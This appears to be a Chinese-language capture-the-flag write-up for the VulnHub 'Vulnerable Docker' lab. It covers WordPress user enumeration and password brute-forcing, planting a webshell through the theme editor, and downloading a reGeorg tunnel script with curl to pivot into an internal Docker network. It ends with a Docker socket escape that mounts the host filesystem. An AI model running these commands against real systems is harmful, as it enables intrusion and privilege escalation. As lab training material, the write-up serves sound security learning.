vulnhub-------docker_containement

===========================

个人收获：

1.利用reGeorg+Proxifier进行内网渗透

2.学会wpscan

3.学会了Docker Remote api

 

=============================

 

下载地址:https://download.vulnhub.com/vulnerabledocker/

 

靶机总共有3个FLAG

=====================================================

靶机IP地址：192.168.110.131

Kali：192.168.110.128

 

======================================================

先用netdiscover来进行主机探索或者用nmap

discover -r 192.168.110.0/24

nmap -sn 192.168.110.0/24

 

然后使用nmap来对主机进行详细扫描

 

nmap -A 192.168.110.131

 

 

发现主机打开了8000端口，我们看看

是一个博客

 

我们在最底下发现博客使用wordpress搭建的

 

我们使用wpscan进行漏洞扫描

wpscan --url http://192.168.110.131:8000/

 

打开http://192.168.110.131:8000/robots.txt 看看有什么线索

 

无可用信息

 

使用wpscan进行枚举用户

wpscan --url http://192.168.110.131:8000/ --enumerate u

 

安装正常思维对用户名进行爆破

wpscan --url http://192.168.110.131:8000/ -e u --wordlist /root/1.txt

没有得到任何信息

 

这个时候我们在回头看起robots.txt，打开wp的登陆端

http://192.168.110.131:8000/wp-admin/

 

 

我们使用刚刚爆破出来的用户名bob进行尝试，而在这里的密码需要使用burp进行爆破

 

 

爆破的结果：

 

使用爆破成功的密码进入后台（找到第一个flag）

 

 

接下来我们使用wp的在线编辑功能在404页面写入一句话就可以。

 

*这里我用蚁剑连接老是报错无法连接，后来改用C刀就可以正常连接

 

收集下数据库的配置信息

 

然后我们用模拟终端查看下系统信息

查看下用户信息

这个系统还是比较新的直接可以放弃提权，否则Dirty Cow之类的漏洞还是可以的。不过我们参考下面的一篇文章，找到一点灵感

https://paper.seebug.org/396/

 

 

输入ip addr

想起题目是Vulnerable Docker VM 猜想应该就是docker.sock或者http api未授权访问之类的问题，但是翻了下没找到

 

但是看到机器的IP，感觉这个虚拟机里面应该还有个docker network的内网，简单的ping下，发现至少存在172.18.0.1-4的

这个时候需要坐下内网穿透，方便在我的电脑上操作，否则shell里面缺少很多工具和依赖，比较麻烦。

 

===========接下来的步骤没有成功，用curl提示执行失败，代码手动写到404文件也无法连接=====================

===========直接复制原来文章的步骤=============================================================

我使用的是 reGeorg：https://github.com/sensepost/reGeorg

curl -o tunnel.php 
 
https://raw.githubusercontent.com/sensepost/reGeorg/master/tunnel.nosocket.php

浏览器访问了一下，显示Georg says,'All seems fine'

本地电脑上运行python reGeorgSocksProxy.py -u http://192.168.30.171:8000/tunnel.php

 

[INFO   ]  Log Level set to [INFO]
[INFO   ]  Starting socks server [127.0.0.1:8888], tunnel at [http://192.168.30.171:8000/tunnel.php]
[INFO   ]  Checking if Georg is ready
[INFO   ]  Georg says, 'All seems fine'

因为reGeorg提供的是socks5代理，所以需要本地使用proxychains具体配置不多说了

proxychains mysql -u wordpress -pWordPressISBest -h 172.18.0.4 连接数据库，

但是并没有找到什么 flag，然后继续扫内网，还是nmap那一堆命令加上proxychains前缀就好。

然后发现一个IP有个奇怪的端口

Nmap scan report for 172.18.0.3
Host is up (0.0062s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp   open  ssh
8022/tcp open  oa-system

curl看了下，貌似是一个网页，然后在设置了浏览器的socks5代理，就看到了，原来是一个网页版ssh，而且这里面终于有docker.sock。

 

 

接下来就是老套路了，可以参考 ：Docker学习与remote API未授权访问分析和利用：https://www.secpulse.com/archives/55928.html

而我是直接在另一个kali中里面安装了一个docker，这样就可以操作主机上的docker了。

 

 

然后使用volume挂载主机上的所有文件到一个目录

docker run -it --rm -v /:/vol wordpress /bin/bash

这样就可以看到flag_3了

参考资料：

Vulnerable Docker靶机下载：https://www.vulnhub.com/entry/vulnerable-docker-1,208/

Docker学习与remote API未授权访问分析和利用：https://www.secpulse.com/archives/55928.html

WPScan使用完整教程之记一次对WordPress的渗透过程： https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=46194&page=1#pid511454

Docker学习：https://www.bilibili.com/video/av17854410?from=search&seid=13990341548063716463

Tunnel Manager - From RCE to Docker Escape：https://paper.seebug.org/396/

reGeorg：https://github.com/sensepost/reGeorg